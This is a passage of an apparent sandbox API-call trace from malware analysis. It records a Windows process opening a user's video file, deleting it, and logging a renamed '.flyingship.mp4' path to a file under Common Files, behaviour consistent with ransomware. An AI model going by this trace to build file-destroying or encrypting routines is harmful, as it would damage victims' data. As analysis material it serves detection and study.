HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\c2l5d8zfcqafr.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.309] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0199.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0199.309] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0199.309] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.309] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.310] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.310] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0199.310] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.310] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.310] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.310] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4", lpFilePart=0x0) returned 0x44 [0199.310] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20431190, ftCreationTime.dwHighDateTime=0x1d5e066, ftLastAccessTime.dwLowDateTime=0x98709d60, ftLastAccessTime.dwHighDateTime=0x1d5dac4, ftLastWriteTime.dwLowDateTime=0x1bafc180, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa550, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="c2l5D8zFcQaFr.mp4", cAlternateFileName="C2L5D8~1.MP4")) returned 0x90ae18 [0199.311] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\c2l5d8zfcqafr.mp4")) returned 1 [0199.312] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20431190, ftCreationTime.dwHighDateTime=0x1d5e066, ftLastAccessTime.dwLowDateTime=0x98709d60, ftLastAccessTime.dwHighDateTime=0x1d5dac4, ftLastWriteTime.dwLowDateTime=0x1bafc180, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa550, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="c2l5D8zFcQaFr.mp4", cAlternateFileName="C2L5D8~1.MP4")) returned 0 [0199.312] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0199.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.316] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0199.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0199.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0199.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0199.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0199.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0199.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0199.316] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0199.316] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0199.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0199.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.316] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.316] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0199.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.317] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0199.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0199.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.317] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0199.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0199.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0199.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.317] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0199.317] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0199.317] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.317] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0199.317] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.317] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0199.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0199.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.318] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0199.318] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3e84, lpOverlapped=0x0) returned 1 [0199.318] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0199.318] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3e84, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.318] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0199.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0199.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.flyingship.mp4\r\n", cchWideChar=82, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0199.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x52) returned 0x8c4a48 [0199.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.flyingship.mp4\r\n", cchWideChar=82, lpMultiByteStr=0x8c4a48, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.flyingship.mp4\r\n", lpUsedDefaultChar=0x0) returned 82 [0199.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0199.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0199.319] WriteFile (in: hFile=0x160, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x51, lpOverlapped=0x0) returned 1 [0199.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0199.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.319] CloseHandle (hObject=0x160) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0199.320] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0199.320] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0199.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0199.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0199.322] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0199.322] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.322] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0199.322] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0199.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0199.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0199.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0199.322] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0199.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0199.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0199.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0199.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0199.323] 